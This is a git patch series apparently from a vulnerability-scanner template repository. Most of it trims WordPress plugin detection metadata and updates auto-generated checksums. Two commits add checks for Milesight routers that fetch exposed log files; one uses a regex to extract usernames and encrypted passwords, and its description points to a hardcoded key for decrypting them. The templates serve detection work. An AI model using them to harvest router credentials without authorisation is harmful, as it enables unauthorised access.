index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 0599afee2c7cc8bdb26fcf63455dfd0f26c74154 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 2 Oct 2023 12:01:44 +0530
Subject: [PATCH 0644/1090] Create milesight-system-log.yaml

---
 .../other/milesight-system-log.yaml           | 39 +++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 http/vulnerabilities/other/milesight-system-log.yaml

diff --git a/http/vulnerabilities/other/milesight-system-log.yaml b/http/vulnerabilities/other/milesight-system-log.yaml
new file mode 100644
index 0000000000..f3f58f52a9
--- /dev/null
+++ b/http/vulnerabilities/other/milesight-system-log.yaml
@@ -0,0 +1,39 @@
+id: milesight-system-log
+
+info:
+  name: Milesight Industrial Cellular Routers - Information Disclosure
+  author: ritikchaddha
+  severity: high
+  description: |
+    A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security discovered that it was publicly disclosing system logs, which included internal information.
+  reference:
+    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: http.html:rt_title
+    google-query: '"/lang/log/system" ext:log'
+  tags: milesight,log,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/lang/log/system.log'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'daemon.info'
+          - 'authpriv.info'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'text/plain'
+
+      - type: status
+        status:
+          - 200

From fef8a38e22aea5b5b0da7a2dc314a8c5f4557910 Mon Sep 17 00:00:00 2001
From: gy741 
Date: Mon, 2 Oct 2023 17:21:12 +0900
Subject: [PATCH 0645/1090] Create CVE-2023-43261 (#8300)

* Auto WordPress Plugins Update [Sun Oct  1 04:12:23 UTC 2023] :robot:

* Create CVE-2023-43261.yaml

A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.

Signed-off-by: GwanYeong Kim 

* Revert "Auto WordPress Plugins Update [Sun Oct  1 04:12:23 UTC 2023] :robot:"

This reverts commit ceb38c80b011136c9fc51b84ea2f6db1e94060be.

* added metadata

---------

Signed-off-by: GwanYeong Kim 
Co-authored-by: GitHub Action 
Co-authored-by: Dhiyaneshwaran 
---
 http/cves/2023/CVE-2023-43261.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-43261.yaml

diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml
new file mode 100644
index 0000000000..14cdba841a
--- /dev/null
+++ b/http/cves/2023/CVE-2023-43261.yaml
@@ -0,0 +1,28 @@
+id: CVE-2023-43261
+
+info:
+  name: Milesight Routers - Information Disclosure
+  author: gy741
+  severity: high
+  description: |
+    A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.
+  reference:
+    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
+    - https://github.com/win3zz/CVE-2023-43261
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43261
+  metadata:
+    max-request: 1
+    shodan-query: http.html:rt_title
+    verified: true
+  tags: cve,cve2023,router,milesight,disclosure,unauth,iot
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/lang/log/httpd.log"
+
+    max-size: 5000
+    extractors:
+      - type: regex
+        regex:
+          - '"username":"([^"]+)","password":"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)"'

From a8bc3ecdd008d6db3df4a3ea027d9affac53b26a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 2 Oct 2023 08:21:33 +0000
Subject: [PATCH 0646/1090] Auto Generated New Template Addition List [Mon Oct 
 2 08:21:33 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 83ce27cb8d..f97197b17a 100644
--- a/.new-additions
+++ b/.new-additions
@@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-29357.yaml
 http/cves/2023/CVE-2023-36845.yaml
 http/cves/2023/CVE-2023-42442.yaml
 http/cves/2023/CVE-2023-42793.yaml
+http/cves/2023/CVE-2023-43261.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/cves/2023/CVE-2023-5074.yaml
 http/exposed-panels/ws_ftp-server-web-transfer.yaml

From cc0f728fac8b3af27d5ce90ee8e4b93c2f754e36 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 2 Oct 2023 08:21:36 +0000
Subject: [PATCH 0647/1090] Auto Generated cves.json [Mon Oct  2 08:21:36 UTC
 2023] :robot:

---
 cves.json              | 1 +
 cves.json-checksum.txt | 2 +-
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index 598eac4a86..99f59bbedf 100644
--- a/cves.json
+++ b/cves.json
@@ -2032,6 +2032,7 @@
 {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
 {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"high","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
 {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
+{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
 {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index b71cb18692..a5f1409546 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-cf00d3e1c6a26a5c5e737e17baa8955c
+a405128e3a7c77f6d98e91560a731f69

From 391ddf26b413ff00b0f83b9bfc149cf3c48e8cac Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 2 Oct 2023 08:22:09 +0000
Subject: [PATCH 0648/1090] Auto Generated Templates Checksum [Mon Oct  2
 08:22:09 UTC 2023] :robot:

---
 templates-checksum.txt | 405 +++++++++++++++++++++--------------------
 1 file changed, 203 insertions(+), 202 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index dc58bb5883..a085c3c401 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -564,7 +564,7 @@ helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf
 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c
 helpers/wordpress/plugins/wp-statistics.txt:d5b438b33eefd2351317d48768c3cfdcc2e1fbc7
 helpers/wordpress/plugins/wp-super-cache.txt:e9e533b0da8e5546eff821a40fbf7ca20ab9cf7e
-helpers/wordpress/plugins/wp-user-avatar.txt:40f7f795c98a6e3f421465c06243187d42d8e3c5
+helpers/wordpress/plugins/wp-user-avatar.txt:7d8386aec2c68cfbad0e075ba69d967a10bd8b57
 helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe
 helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0
 helpers/wordpress/plugins/wpforms-lite.txt:640b75d1936f52903edd2795db2c553f3ad94165
@@ -2657,6 +2657,7 @@ http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
 http/cves/2023/CVE-2023-41892.yaml:e042c550adbe64454aea30c413ded1b9d7a72814
 http/cves/2023/CVE-2023-42442.yaml:c6e765cc76d6e24c920ac246e83837e68011c2fd
 http/cves/2023/CVE-2023-42793.yaml:a879cc4583f87b594db0f3f5211b2e4c2ca9c10f
+http/cves/2023/CVE-2023-43261.yaml:d923a932d7f9dc12966e8636ff83495a7d038448
 http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
@@ -5870,218 +5871,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
